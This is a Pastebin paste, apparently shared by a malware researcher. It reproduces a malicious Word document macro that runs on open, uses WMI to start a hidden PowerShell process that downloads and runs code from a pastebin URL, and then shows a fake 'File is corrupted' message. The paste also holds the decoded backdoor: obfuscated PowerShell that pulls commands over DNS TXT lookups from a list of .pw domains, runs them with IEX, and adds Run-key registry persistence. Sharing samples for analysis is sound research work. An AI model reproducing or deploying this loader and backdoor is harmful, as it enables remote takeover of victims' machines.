Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ## uploaded by @JohnLaTwC
- ## 340795d1f2c2bdab1f2382188a7b5c838e0a79d3f059d2db9eb274b0205f6981
- ## macro
- Sub Document_Open()
- Parsing
- End Sub
- Public Function ParsingA() As Variant
- Const word = 0
- strComputer = "."
- Set objWMIService = GetObject("w" & "" & "in" & "" & "mgm" & "" & "ts" & "" & ":" & "" & "\" & strComputer & "\r" & "" & "oot\c" & "" & "imv" & "" & "2")
- Set objStartup = objWMIService.Get("W" & "" & "in" & "" & "32_" & "" & "Pro" & "" & "ces" & "" & "sS" & "" & "tar" & "" & "tu" & "" & "p")
- Set objConfig = objStartup.SpawnInstance_
- objConfig.ShowWindow = word
- Set objProcess = GetObject("wi" & "" & "nmg" & "" & "mts" & "" & ":" & "" & "\" & strComputer & "\" & "" & "r" & "" & "oo" & "" & "t\" & "" & "c" & "" & "im" & "" & "v2:W" & "" & "in" & "" & "32_" & "" & "Pro" & "" & "ce" & "" & "ss")
- mStr = ""
- mStr = mStr & "powershell -C ""IEX (New-Object System.Net.WebClient).DownloadString('http://pastebin.com/raw/sxPYz7fT')"""
- objProcess.Create mStr, Null, objConfig, intProcessID
- Selection.WholeStory
- Selection.Delete Unit:=wdCharacter, Count:=1
- Selection.TypeText Text:="File is corrupted."
- End Function
- Public Function Parsing() As Variant
- Const word = 0
- strComputer = "."
- Set objWMIService = GetObject("w" & "" & "in" & "" & "mgm" & "" & "ts" & "" & ":" & "" & "\\" & strComputer & "\r" & "" & "oot\c" & "" & "imv" & "" & "2")
- Set objStartup = objWMIService.Get("W" & "" & "in" & "" & "32_" & "" & "Pro" & "" & "ces" & "" & "sS" & "" & "tar" & "" & "tu" & "" & "p")
- Set objConfig = objStartup.SpawnInstance_
- objConfig.ShowWindow = word
- Set objProcess = GetObject("wi" & "" & "nmg" & "" & "mts" & "" & ":" & "" & "\\" & strComputer & "\" & "" & "r" & "" & "oo" & "" & "t\" & "" & "c" & "" & "im" & "" & "v2:W" & "" & "in" & "" & "32_" & "" & "Pro" & "" & "ce" & "" & "ss")
- lStr = ""
- lStr = lStr & "powershell -ep bypass -C ""$data = [System.Convert]::FromBase64String('H4sIAAAAAAAEAO1da3PayNL+7l+hol"
- lStr = lStr & "J1cG0MJPbuJpvyqXeEwSYxtmWDHRP2dbCQZWxArCSsOHv8309fZnRD4EvYPWsl2dooAmmmp/vpy/TMNCsX07HpD5yxdgZ/ypvd8i"
- lStr = lStr & "b8D//Bv4sv/oS/4Z6+4X+U71ZX/tTwC3yiy5/jW3faprZnBWv751eW6WtHt55vjUqN/VLTGjnu7ZHvWr3RuxWN2+zKnqiZua9Wnd"
- lStr = lStr & "HEtTwPyCttdwYTbqSY1ftL7VP2e7F/N52+9ftvv6lPViU1XW6JSIL/5lLDvZ+4A99yi1nDmNdgid6Zw81571SHjmcV+esyv8QP4C"
- lStr = lStr & "NIYxYXSi1HuG7vlt5zLX/qjkO+VJ3xjeX6wICWo/c865cNGNBgbBez2of371YiaDDdZdkVPAMY+FQd9YeWrw/GfWxl9XftoOeCdF"
- lStr = lStr & "agx2Dgm5e/K2HLRss88ruXs0/Qd2VmSbdMT1BjFrL6wPEGRMamVnmpNXvjfs8HRCELWu7UWv0d26OhcHv0p0x9MrXz23v1kPZUM9"
- lStr = lStr & "0zyZ/57b1+aHtdJfHF7a0/cLxlKR0W0Pz2NlLt1XtDL9EgNhdaAAnUuxVtVaJQ2QcGHaGw+KllffFLtbHpIA4AXu3xAP5tlbYtXy"
- lStr = lStr & "LsU4S9uuuMEuj713uh/yp2muI00G/F9rUwhV4RW474GIgbUQ/gql+I6htxYOgmXj8K/nw34Hv6fKciGkK8FVUhGrYYiC1PbBnig6"
- lStr = lStr & "gawgr0r2K7KUxbn4gdIfpC/CLqb5Ltxu4/CrjC/W4A7XH/1O6BIWxRE9CouBZVW5wEeltst4WF9FY3xKGhT7Gf80C/xnGc2/pY1C"
- lStr = lStr & "ti38b+2ng/ib5vi11b38FrX+gtsWMwfdsbohMIR9Q9YQT6Dd73bX0odhr4XB/5sm/r23gP7fii1hCnBo6vLfZsURH1Jj53G/YPdL"
- lStr = lStr & "4P9IHYMYVhw3O1mjgM9Cu8doS+jte+oeuiZoqmgCu008b7rQq8Jyaiei0+GMJDPn4Q+rmoG6Jj6BtIL9BfR/pOiU5D9Gj8pvhowH"
- lStr = lStr & "iBzmO6vw6/7xhiiv3A+5l0Aj+3xPYbvH+NdAA/KiH/aqd4D+1UcByXiBdo7zUKuR3Ac8AP1T/IZyy2gV+BXsXnDAP4vGXj9UrUa/"
- lStr = lStr & "i+i+M2AuAXXIE+HfnYpGsN5QzyNnHcNP7d5yfvHo3P1n/B65HQj/F6YvP4lLxbeA35ZCB/SO4w/rGUO4w/EO8F03cskC4b9QfkSO"
- lStr = lStr & "O7QnkBjuQ4QnqP8b5nhN8PiV8Bvp8lL8BVjfg0FTuniI9bfE7h6NDG8QEuDKBzuyZMbGfrVOxl8RHkxuOkcdE490U4Tl3stHGcDe"
- lStr = lStr & "KPAXJBvciPvF9Lee9F8m5gv8QH0utagHJS8pZ6kQ95mwl5txnP+ZS3suevpT3v4LUl4PsQ9zbbtec9zo4c5ys5TvJfp7Z+SOOUuO"
- lStr = lStr & "4EcVybLO/tZm5wTX4Z5EnjrDt8zSeue1LeX6S892Scchj5LZv1GuIJwvmzj1MM9r9bNbbHtQpem/g9vL8u7TnFa897nDX0P1Vsj3"
- lStr = lStr & "F7zfEY6+srOU49Hpc+9zgE8L5OfknGW+Sf8h2HDGQc4kp53kTxdV71t4HjAf1tSL9DeO7Jaz5xLf2vwjXHW0a+4y2aN4ovUp6HOY"
- lStr = lStr & "231DhvE/prx/ME+dNf8ktbcj5Uv2b9zbNfshm3VkJ/mzw/zKv+Ujwlvkp5vpd+aZxnXFNcue3F5kO590vr8XxHL/gOcE3zJRHE7X"
- lStr = lStr & "Uyz5c3XDelvT6V+Suy2+y38orrQMYZiXlELc95gCtpr18ncG3kOQ5pSnu9wfLkOORayjWvuF6P8ni2OJLyzLG9vpL2Wq3DufmPrw"
- lStr = lStr & "2eH+8Ittec/8m1ve4IzttaCVw385z3YTsVzY9VfJ3jOMRIrjfU24zrHM8bOzLfsSdi+Q61XyCfuB7KfOaNlGc9//F1m+PrHRVfC5"
- lStr = lStr & "435jgOgfcT64ltI/fzxqHcB7PBcYiga8fIN6478XxIrc3rT/nG9TjK09s4f9IlHx6Ea7j+KgBCVVsf4fM0zh2SK+GwIffJRfvoeL"
- lStr = lStr & "+c2pdH+/R4P9FbeXXkfrz7n6fPw+/fIv8bqGeMz4rYtkXLhnEjLgXyC+gTuod0076/HbX/T/B7cE90Jvf1yXu1/4/7p/1/sf2E8/"
- lStr = lStr & "cnPq69/QBEBSyAdu2QD4p/6r0YH+i92P0F7j/cIroGotqIjY9xZBm6lBe2L7gfoLdD9zaOg+QOeuaI2gbgDz+voFyHcpwxPgqxS7"
- lStr = lStr & "gBvEp6SU9Q/kLfR32F9n3CG9ElEC+x8RFds/RkyCPad6n2dSp+xu5j8vhA8WVbnFB7DaQf7F2AenOD+g34CCT9X3A8rEfXOO6fcR"
- lStr = lStr & "7SQXzBONhOS/kqORLf0/tLY5+rK9Mzi0egBz6/FVsb4j3Gw1Xiiy12EL9sl8/RDuB8APm3k7Z7RHeA+t1H+tjuTeW+VuVnrrC/Ux"
- lStr = lStr & "wX2MOmAPsL/G9Svw3sL7b/NeL7xax8hsg3siNpOe3Mvr8E3Dq47g9+8ZTHg3hrIj9u0K71AsSXYFztEF+HEtcVlJ+J9EI7fcH+Js"
- lStr = lStr & "KRshvp/cHK7sT2CcP1AvkD/Tdt8ZOonoom0gd2A/jxBj8nfgBfOgbbu130p0n7SnoD9Fzi533BdJ7bjEflJ8BeOGSnbfQHAvAmAp"
- lStr = lStr & "ITrq9hf7aY1Q/AVZrvCp+RvmTsf47JAe6j/cpPlReOL0AcBmjvichH4Q/GdxLAeOtpu0e4Az6e8j7qp9kBn/TCYH4DXZNH4jdzP/"
- lStr = lStr & "is3U7yOcavOfyN8TMmp/Q+8wsD/DwQq+IAwNcR4gT0/5r9O/O/ZSC+bOS/T3bZCO34r4/fv36N8RnFIX2MN6DfDwbi8h47kcAjvk"
- lStr = lStr & "92ieRvzciV5WlSnovimgD7gTgok64EX2PyjtmLJ/ntE4x/VFwJfGxjfIh6KzheJPzUKojfDbK76Ne2pX16kjwxXpJxL8dJFeT3Ry"
- lStr = lStr & "Op30n7m4qDlJ2K9aviINXfPL48VG8uhH7A/h/Gn463EzhI62cyjkvIMU33A/TzB26+ATfAH6JvJ4oL0vFLGjezcgN7oOSt9Bvk3Z"
- lStr = lStr & "fz1T7J/w37s20Z97Pdqch5j5RnMr6L6Mj2w1F8H9qr2LkajCNh3oV2j9brndD/Nmh+c434oHjonOaN1/AcXiv4nI/0Aj9+jnDdRj"
- lStr = lStr & "n5KftGuMjE7TxcxeLOFs27TbTXB7i+3rPDOM7Gfi0ZJxA9INcjfA6uPG+neIHoMsn/XPM8j+eDPTmvUPO4IfmD1HwpMy5N8Jfle0"
- lStr = lStr & "Hzc4F+egHfmpwvAP9H/UEcBs8pud/zvb4XzmfD+XjW84CTefxfMI5EPLME/qt5dgf9KcjhWM7jVNz24Ym4+JDSU8J/+pxaIv6MyY"
- lStr = lStr & "nt2lukL0FPWs+WwD/w+1tyfkTzjw9z2p1npyJ7GcNhen78aL3fwDwK5VVNymvUQH6I9+tkvJhh77JxPT9vwv08IC8WH0fajsf8UA"
- lStr = lStr & "wXb+P0KjvdwfMKnAerRHouWF8Ar4w3Nf98SL4iGd/P4iqpJ4/lz+PySkY4/8rE/zOw/5l6ndZTpQesPx9lXFKR+vMk+ewKzpPszs"
- lStr = lStr & "yjld4tsO8c30zpnIvMF1IeJ60v0O454Q/0XaTjoUePu0X5QkN3Ucgwv/NknmeO3ZuJM+ad112C3O/zX3R+huZ3afv/4an8ID/jYX"
- lStr = lStr & "s/y7zNENsDPr0XtTfSzpIeBbK/r/icypfe933LUHnxMH9cIxxnxQ8ZcrdScXpEf3Y8GsXL+j6tOwQY377B/Qh/yH4pP7ZgvKl4Be"
- lStr = lStr & "expHfXnLdS8Uv2fGbe/Jri4gV+Lz0fyfTXaf+UmGcl/XDG/Jn8kxpXh/Jwb6TeGRn+k+UC/HkV5YGicUf9ZMfnig8XUb797T15d4"
- lStr = lStr & "/oCXj9iPFM8rmU60Iyj4B4R//G8eB7mrdXcDzpfFbse3rPj/IRBusZ3NM6hcrDc383pH+pdYzdOflilR9OzP+y9amN+YUY/xWdZO"
- lStr = lStr & "/70g5buP6Vzm+l9TYjz3WRsl/kL3au4/KczcthPs/mPOV5vF8VF6TzxOn5Znr+DvMt0BNPrltl5MmfNK6n6vMD+R36/1vOqyvcPK"
- lStr = lStr & "91sWMjue/sWK738vqgI88B0PrYkTyHF8T3tZzI8y/HIv5+Ozw/n1wnpXiM7EMH88DpOCmdR1kcZ6bXUeiazt8B30a8TiIun4jTh+"
- lStr = lStr & "dTWQ8nlK+ZzfO+nYPr770eR0euvyfqcShccR2KJu+zUedTIJ7LTX0Gud8ieV5f7uvm9fktua/7Su4r+8rr1IzbZ70Poe7I84JtuR"
- lStr = lStr & "/S4/X3jLokJwk7JeuzPO99J534uWbA23GE+5zuO1Hy3rblfgs6330pz7kn69BI/T8XuatD8zUu71zvM1LyDvfP2bk/dxXaqXgdqf"
- lStr = lStr & "p1/Lz/d2DPxXdz/vtEnbNL1JHK9bmNRF2SsJ5Wrs8j/ajXYcp6OznG9Y96Hd+BvU7X6zg2vpd6HUl73RH5xnU7ges3jOscn7NTuO"
- lStr = lStr & "bzSCbvbwd7neNzdrKOhf5z/NwG4C2/82fANeVlt5rJOCTf9prikF68rlC+6/6pepa3iXPROcc11/0TSXud4/NILE+w1zKfGctv5x"
- lStr = lStr & "XXso5Fqn6pkee6Q3IdjeuzKFx3cj1vlHUszu34Obtcx9dX8frDal0033VaZX2WrWZ83Sbv5/25rraMr8+D3NtrWccirJuv6ljkOM"
- lStr = lStr & "8n67Nw/eEovs5xHNJJ1e2kfAivV+QX11xPqyLleSXX4XJsr9ty3VXlr9u5j69VHYueiK/DOXmOQ1QdC0/G14f5nzeq+ix2fH15mH"
- lStr = lStr & "Ncj+P5kEO5Xy/XuN5OrDd2pL1+6LwxvX969hz5Y/fZLWvf3jy6lvj7X08aJ8gPcCvli+djSU7TcP8z12XYo3NKpB+0L9aX+yyfdN"
- lStr = lStr & "70A9oNxhedF6LzXpnn5WPtx/ZxJupRZNeniH4PbWY/p4l+YsJ1Dmb29T72PP3sfv7M81Mz9SCCLDz87+uWzD2nnBr3vPN9M+ec0v"
- lStr = lStr & "uzH1s3R9aV4H37p9KeqnPJcD/h8yVLO0c9kHyd5TvXMZl/jjyz3kvWPuB76o8srh8ze+4os97HjB5G9ixRD2Nx3Rfehyfrryw+Zz"
- lStr = lStr & "FdXn2JRliPpBUwfgHXab+Tic/ZOi/fwC+ur/QEPtP5TsaFPNe5QM+dJ+tTlc7/fXmO5xBOVbwu90H34/tN0v78CfrB5+ZqHG9yPR"
- lStr = lStr & "dPnudT9ZG+RufLNvhckOLjA+og9GQcHKuD8BX3NTfRri/wl3sGEM31YuaMi6+Krr6UG9UDepx9oToWUX2Gb8XX3PNTT5JP7JxGRh"
- lStr = lStr & "0p4t8U5cPnhWj8HtpL5n8Nn6vNtdMx/3gfnxf7udm6CYnznelzLOp8Xiz+SNQtWlinia9c38wIzz2yfSX8/cX2NkMOC/g2z86qcz"
- lStr = lStr & "Hnst5Xdtx0Pz4y44yM88LpOGsJccYDzgFuLC9utxfwMaMeVmZcnK5/kj7/GjvHm3kuNHGuLn1eKsQ5vXeB/dfeME7QPqb8xAJ5Z9"
- lStr = lStr & "a9egTdUdzKdXVIzw05T/mGeUKs3dk6NvPOzcbqjSzFvsziJSNuVXoQk+ORoddF3X4yHhbgKzVvTp/TT57PT9arnF8f7AH8/HZ9eA"
- lStr = lStr & "Qf728vbTfT89xUXZRAuPfEJek4pLXkOOQVxhfq+4x6Tety3veg85QL+b7U+JXjxHOsuzeTF5oTP8+dl5O9GUR1D7ysvMIcP5aMpx"
- lStr = lStr & "LfQ/x7Sv6xCfPpeJ2WxHn4xPsdGSedyvjFMpLvzeN7R8oN/HlmPSx1pffE5ua/Vlflz9Tzr9Pzn26Zf6beGt/8NnEd2+2N+j2/99"
- lStr = lStr & "O3/2496MFHKR+KS/oYh8ToODsjKrpMT7fcJTq+udteoMpN8vS5GWA5SVILYm+cDWXZcxmJ+Gu779uItmbYPfR7RiM/kxfsvpAlnc"
- lStr = lStr & "+/ZRFbWNEGF0Vshx7Db8vc2J22Zv2hvWi5Uwt6+pP7KnflX/g09zV07IHJcsD3uF1q7E6T7W5yo9R29Ck1pYi5ky3wB3JUm/xpmS"
- lStr = lStr & "nrnklRI9H0eVc+yd8iNXtWsLZ/fmWZvnZkmVN34N+WDoCj5mDSG5ZOBuO+E3jhB0Xt0/ynGn1r7MM3IB6QWXXqunBfXF3VFMdm+i"
- lStr = lStr & "81vMb40BlaxQXN6tPB0OfHoGXRHw3GA893e77jrjLH/QTHiafMurPyksB1JPRdLHHTwil1nabaIyqxGnDKpYMmlE3+lUypf6WpOy"
- lStr = lStr & "2pBFhKaxK6iB06wmGiyerTVL3BJTygvWOZoo+VjNmMA1dKOwLucx4aep0GV/erK/Nwt6JZQ8/6G4TZFMdLG/HfJKRlkvyNQiKLJK"
- lStr = lStr & "0O/08j/WSGg2g5jbG//rr4ovji4OjYcr2BM271zodWKbwtNXtXjvuf/am/xgNdLbXcwaiIfSgbm+5jzfa116TsnqmtHfT8y2zPun"
- lStr = lStr & "bcG04t+o5MtLLjaCKxN6s3ynaFK1rvYQ1nGPdFDaexLY106AMIKFnU/qQVPo8LcMnqciV850yqipSEdA2hJyhvFrM6BU6iB2j41u"
- lStr = lStr & "jAdSYguttw8Bnqt7bXG1nateWOreH6a3hSvtO6nVgayzDN+QRdaxeOa1oKQd+BP4pJkiV7t/kXhToQwB/avHCmCkiitr5bCWOKbh"
- lStr = lStr & "Qr/JVUqOmSGfC0htLRMvwEauxgNAB0WjcgjDpw0nK1tTGgypv0TEtzHcfvetNzz3QHEx9shPYf7dAaOTfW2slowMCQbVSd0ag37u"
- lStr = lStr & "8OxlYNGwNavekIm9t7SnNnZxdEje+YsqFzkDcB+rHtMcOlyToLPdeR5eNTjbHn98bQ2BqMYDKFLnH4PBGo7jcP2q3a4Z5o1uL9fr"
- lStr = lStr & "u0TFkkCrBh0mKRwWFxIkmmikJKaQGFw57nAWtqcWkJ1wb2jH1P+78/yR5sZgL9nUZvRYNYhiNMDAMc2BHm8uunWLueAaYZU8u93e"
- lStr = lStr & "2N7WnPXk6fx7Rvh52fbH8p7bZT9fxhfvmHnJfehvXWeV7+XipUReY9r2gfWRDWk4xEV2vzPg9et+f1dJk35vyoQEWl/Eaffgegzf"
- lStr = lStr & "W1qiJcP+zIdaYjg38HgT7nfUdDuT7wFeloUJ0Bk9vdaoIM9Avk0zn+LigHD63ZusIm8TF0XNKhsaei6VHhIc5fudiumkDBM89ax+"
- lStr = lStr & "Zbs0x1m7XooG5fwGf5GGKRA18GRI0A48058WO6tDFDwAwhwan5deRAW75HvqCOKRqG/jlxin7qYoqpr48Cf9qBUhYqDnXkkoVHuQ"
- lStr = lStr & "RKvbSlKsZ41rJGk2HPR+YUqr91pavuHt16ENmsv1YfHDiB5R5dWsNh9+ZVqdKd4L2H9yXrC6CFHzvyb4eWtjPoQwAB8tE+Fxq1j9"
- lStr = lStr & "rnF0XgGgBq7IM0FoaIC8LAeLT7uVAAPZirCEvs1IFOPe60sKLJ2EvpD9nreI/24gB4UfT8/6nxcWflxPA40PvEsiktQKh+61teMY"
- lStr = lStr & "vYVck2Di8lGXIKUo1NQRJoziIEG/LMS7/nXXsEgXJdK5swPoBS2R9HoW7Zd7XCQ+BiZRJW0MowX3HGgz48Wh5o65XEfCByoCpg55"
- lStr = lStr & "Ch8PlFP8arBapKMHlgGL9aUsNafff5xchLhd3cV2O/1ITIxr1lcdODpRMIia0iEPVSq7wEqPRLu9bY9i+5ndKRZV0XKy8rqxAWIQ"
- lStr = lStr & "72psMhfGPO7QGts2t5NBnc7gwm3FcRG3sZjjr1XOzfTQAKMGPLMuVnSIfnzuuNWz+0en3LLSJZ+LgPT+NLJfiu7zvWuF9cfceK4B"
- lStr = lStr & "eUdsYYKHXlEfCdlSyi7vHTroOe69875ZoBkZpy3WdmHgcgpCU0JT/88A8//Pf44SwMSy/6cCv+99GVbfSfrW6cnfEUsOUordDVFD"
- lStr = lStr & "muHHKeuJk5D0a0SI3azDQed+A7MFwZg++ILbXI9RD57N0q+Ew0XFmMf0dcjnnXB00n5hvHZYd9aDax3YI56gNMAT6WeekgLDTn/I"
- lStr = lStr & "rQB11XCb7sw4qfC58LJ5x0KBEc8YNV7d+Z61kcdmX0oFovudOxhi1E8J4Ty5AlA0c7cYYD81Y7v50gDgDy2YD/XHhZ0f69iKrFXi"
- lStr = lStr & "+ZOH9EsrEQMHMyey5EPvDbjITshF7O7uhHkPcjyPvHBnlPDfF+2Krvx1bN97cko4Wkv7tLO95/1g4IGkHmEtvncSap8M7d3UrYsY"
- lStr = lStr & "z1y90lhGF9Csg5F/rPay7cySw4q76MuDPgHysxVZNrsxto+LMk8v4a9tNPM2/Rkdp1mRr38Kc2dvEnFRQfCzc3hSX0RcdwY8faLL"
- lStr = lStr & "rH9Pv/nrn/BcWzSyNlqQAA');$ms=New-Object System.IO.MemoryStream;$ms.Write($data,0,$data.Length);$ms.S"
- lStr = lStr & "eek(0,0)|Out-Null;$cs = New-Object System.IO.Compression.GZipStream($ms,[System.IO.Compression.Compr"
- lStr = lStr & "essionMode]::Decompress);$sr=New-Object System.IO.StreamReader($cs);$t=$sr.readtoend();IEX $t;"""
- lStr = lStr & ""
- objProcess.Create lStr, Null, objConfig, intProcessID
- End Function
- ## decoded with https://github.com/JohnLaTwC/PyPowerShellXray to:
- powershell -ep bypass -C "$data = [System.Convert]::FromBase64String('
- function ____/=\/==\/\/\_/=(${_/===\___/====\__/})
- { ${_/\_/=\_/=====\/=} = New-Object System.IO.MemoryStream;
- ${_/==\/=\/==\_/\_/} = New-Object System.IO.Compression.GZipStream(${_/\_/=\_/=====\/=}, [System.IO.Compression.CompressionMode]::Compress);
- ${_/\/=\_/=\/=\/\/\} = New-Object System.IO.StreamWriter(${_/==\/=\/==\_/\_/});
- ${_/\/=\_/=\/=\/\/\}.Write(${_/===\___/====\__/});
- ${_/\/=\_/=\/=\/\/\}.Close();
- ${/=\___/\_/=\/\/=\} = ${_/\_/=\_/=====\/=}.ToArray();
- return [System.Convert]::ToBase64String(${/=\___/\_/=\/\/=\});
- }
- function _/===\_/\_/====\/\
- { [CmdletBinding()] Param(
- [Switch]
- ${_/===\/\/=\/\___/=},
- [Switch]
- ${_/==\/\__/==\__/\/},
- [Parameter(Position = 0, Mandatory = $True)]
- [String]
- ${______/\/\/=====\/},
- [Parameter(Position = 1, Mandatory = $True)]
- [String]
- ${_/=====\/\__/=\/\/},
- [Parameter(Position = 2, Mandatory = $True)]
- [String]
- ${_/===\_/\/=\_/\/\/},
- [Parameter(Position = 3, Mandatory = $True)]
- [String]
- ${____/=\_/\_/\_/===},
- [Parameter(Position = 4, Mandatory = $False)]
- [String]${__/==\/\/\____/===}
- )
- ${/=\/=\/==\/=\_/==} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('${script:_/\__/=\/\/\/\/=\} = "";
- ${script:___/=\___/\__/=\_} = @($('olgw.my')),$('oloqd.pw')),$('dsud.com')),$('dpoo.pw')),$('dosdkd.mo')),$('dlox.pw')),$('oof.pw')),$('cnkmoh.pw')),$('dtxf.pw')),$('gjcu.pw')),$('wuc.pw')),$('ihrs.pw')),$('kjko.pw')),$('ldzp.pw')),$('lvxf.pw')),$('mjot.pw')),$('mut.pw')),$('mvzo.pw')),$('mxfg.pw')),$('nroq.pw')),$('nwrr.pw')),$('odwf.pw')),$('okiq.pw')),$('otzd.pw')),$('qznm.pw')),$('rnkj.pw')),$('rzzc.pw')),$('sgvt.pw')),$('soru.pw')),$('swio.pw')),$('tijm.pw')),$('tsrs.pw')),$('turp.pw')),$('vpuo.pw')),$('vxwy.pw')),$('xhqd.pw')),$('yomd.pw')),$('yodq.pw')),$('yqox.pw')),$('zdqp.pw')),$('zjvz.pw')));
- function ____/==\/\/\/=====(${_/==\/\/\/===\/=\/}, $AuthNS=$null)
- {
- ${___/=\___/\__/=\_} = ${script:___/=\___/\__/=\_};
- ${_____/\/\/=\_/\/=} = ""
- try{
- if ($AuthNS -ne $null -AND $AuthNS -ne 0)
- {
- ${_____/\/\/=\_/\/=} = (IEX "nslookup -querytype=txt ${_/==\/\/\/===\/=\/} $AuthNS" 2>&1 ) | select-string -pattern "$([char]0x0022)";
- }
- else
- {
- ${_____/\/\/=\_/\/=} = (IEX "nslookup -querytype=txt ${_/==\/\/\/===\/=\/}" 2>&1 ) | select-string -pattern "$([char]0x0022)";
- }
- ${_____/\/\/=\_/\/=} = ${_____/\/\/=\_/\/=} -split("$([char]0x0022)")[0];
- if(${_____/\/\/=\_/\/=} -eq "")
- {
- ${script:_/\__/=\/\/\/\/=\} = ${___/=\___/\__/=\_}[(Get-Random -Maximum (${___/=\___/\__/=\_}).count)];
- }
- }
- catch{
- ${script:_/\__/=\/\/\/\/=\} = ${___/=\___/\__/=\_}[(Get-Random -Maximum (${___/=\___/\__/=\_}).count)];
- }
- ${_/====\__/===\__/} = ${_____/\/\/=\_/\/=}|Out-String;
- if(${_/====\__/===\__/} -eq "")
- {
- ${script:_/\__/=\/\/\/\/=\} = ${___/=\___/\__/=\_}[(Get-Random -Maximum (${___/=\___/\__/=\_}).count)];
- }
- return ${_/====\__/===\__/};
- }
- function enc($txt)
- {
- ${_/\/\/\/==\/==\__} = New-Object System.IO.MemoryStream;
- ${/===\__/\/\/\/\/=} = New-Object System.IO.Compression.GZipStream(${_/\/\/\/==\/==\__}, [System.IO.Compression.CompressionMode]::Compress);
- ${/=\/\/==\/===\_/\} = New-Object System.IO.StreamWriter(${/===\__/\/\/\/\/=});
- ${/=\/\/==\/===\_/\}.Write($txt);
- ${/=\/\/==\/===\_/\}.Close();
- ${_/\__/=\_/\___/\/} = ${_/\/\/\/==\/==\__}.ToArray();
- return [System.Convert]::ToBase64String(${_/\__/=\_/\___/\/});
- }
- function dec($txt)
- {
- ${___/\_/\/\/==\/=\} = [System.Convert]::FromBase64String($txt);
- ${_/\/\/\/==\/==\__} = New-Object System.IO.MemoryStream;
- ${_/\/\/\/==\/==\__}.Write(${___/\_/\/\/==\/=\}, 0, ${___/\_/\/\/==\/=\}.Length);
- $null = ${_/\/\/\/==\/==\__}.Seek(0,0);
- ${/===\__/\/\/\/\/=} = New-Object System.IO.Compression.GZipStream(${_/\/\/\/==\/==\__}, [System.IO.Compression.CompressionMode]::Decompress);
- ${/======\_/=\___/\} = New-Object System.IO.StreamReader(${/===\__/\/\/\/\/=});
- ${/=\_/=====\__/\/\} = ${/======\_/=\___/\}.readtoend();
- return ${/=\_/=====\__/\/\};
- }
- function logic($startdomain, $cmdstring, $commanddomain, $stopstring, $AuthNS)
- {
- [System.Threading.Mutex]${____/==\__/\/=\_/};
- try
- {
- [bool]${_/\_/===\/\___/\/} = $false;
- ${____/==\__/\/=\_/} = New-Object System.Threading.Mutex($true, $('SourceFireSux')), [ref] ${_/\_/===\/\___/\/});
- if (!${_/\_/===\/\___/\/})
- {
- exit;
- }
- ${script:___/=\___/\__/=\_} = @($('algew.me')),$('aloqd.pw')),$('dyiud.com')),$('bpee.pw')),$('daskd.me')),$('dlex.pw')),$('doof.pw')),$('cnmah.pw')),$('dtxf.pw')),$('gjcu.pw')),$('gjuc.pw')),$('ihrs.pw')),$('kjke.pw')),$('ldzp.pw')),$('lvxf.pw')),$('mjet.pw')),$('mjut.pw')),$('mvze.pw')),$('mxfg.pw')),$('nroq.pw')),$('nwrr.pw')),$('odwf.pw')),$('okiq.pw')),$('otzd.pw')),$('qznm.pw')),$('rnkj.pw')),$('rzzc.pw')),$('sgvt.pw')),$('soru.pw')),$('swio.pw')),$('tijm.pw')),$('tsrs.pw')),$('turp.pw')),$('vpua.pw')),$('vxwy.pw')),$('xhqd.pw')),$('yamd.pw')),$('yedq.pw')),$('yqox.pw')),$('zdqp.pw')),$('zjvz.pw')));
- ${___/=\___/\__/=\_} = ${script:___/=\___/\__/=\_};
- ${script:_/\__/=\/\/\/\/=\} = ${___/=\___/\__/=\_}[(Get-Random -Maximum (${___/=\___/\__/=\_}).count)];
- ${__/\_/\/=\/=\/=\/} = ""
- while($true)
- {
- ${_/\/\/\__/=\_/\/=} = 0;
- if ($AuthNS -ne $null -AND $AuthNS -ne 0)
- {
- ${/==\/===\/==\___/} = ____/==\/\/\/===== "$startdomain.${script:_/\__/=\/\/\/\/=\}" $AuthNS | Out-String
- }
- else
- {
- ${/==\/===\/==\___/} = ____/==\/\/\/===== "$startdomain.${script:_/\__/=\/\/\/\/=\}" | Out-String
- }
- ${/==\/===\/==\___/}=${/==\/===\/==\___/}.Trim()
- if(${/==\/===\/==\___/} -eq $('idle')))
- {
- start-sleep -seconds $(Get-Random -Minimum 3500 -Maximum 5400)
- continue
- }
- if (${/==\/===\/==\___/} -eq $cmdstring)
- {
- if ($AuthNS -ne $null -AND $AuthNS -ne 0)
- {
- ${/==\__/\_/\_/=\_/} = ____/==\/\/\/===== "$commanddomain.${script:_/\__/=\/\/\/\/=\}" $AuthNS
- }
- else
- {
- ${/==\__/\_/\_/=\_/} = ____/==\/\/\/===== "$commanddomain.${script:_/\__/=\/\/\/\/=\}"
- }
- ${___/=======\_/\__} = ${/==\__/\_/\_/=\_/} | Out-String
- if(${___/=======\_/\__} -ne "" -And ${__/\_/\/=\/=\/=\/} -ne ${___/=======\_/\__})
- {
- ${__/=\/\_/\__/===\} = IEX ${___/=======\_/\__}
- ${__/\_/\/=\/=\/=\/} = ${___/=======\_/\__}
- }
- ${__/=\/\_/\__/===\}
- ${_/\/\/\__/=\_/\/=}++
- sleep -Seconds $(Get-Random -Minimum 50 -Maximum 70)
- }
- if(${/==\/===\/==\___/} -eq $StopString)
- {
- break;
- }
- }
- }
- Catch
- {
- }
- finally
- {
- exit;
- }
- }
- ')))
- ${/==\_/========\/=} = $env:programdata+$('\Windows'))
- ${___/===\/==\_/\/\} = $('kernel32.dll'))
- ${/==\/=\_/\/\/\/==} = $('kernel32.vbs'))
- ${_/\_/==\___/==\__} = "${/==\_/========\/=}`:${/==\/=\_/\/\/\/==}"
- if(${_/===\/\/=\/\___/=} -eq $True)
- { ${_/\/\_/\/\_/===\_} = "logic ${______/\/\/=====\/} ${_/=====\/\__/=\/\/} ${_/===\_/\/=\_/\/\/} ${____/=\_/\_/\_/===} ${__/==\/\/\____/===}"
- ${__/\/\_/\_/\/\/\_} = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
- if(${__/\/\_/\_/\/\/\_}.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -eq $true)
- { ${_/\___/\_/=\/\_/=} = $('HKLM:Software\Microsoft\Windows\CurrentVersion'))
- ${_/\__/=\_/\/==\__} = $('HKLM:Software\Microsoft\Windows\CurrentVersion\Run\'))
- }
- else
- { ${_/\___/\_/=\/\_/=} = $('HKCU:Software\Microsoft\Windows'))
- ${_/\__/=\_/\/==\__} = $('HKCU:Software\Microsoft\Windows\CurrentVersion\Run\'))
- }
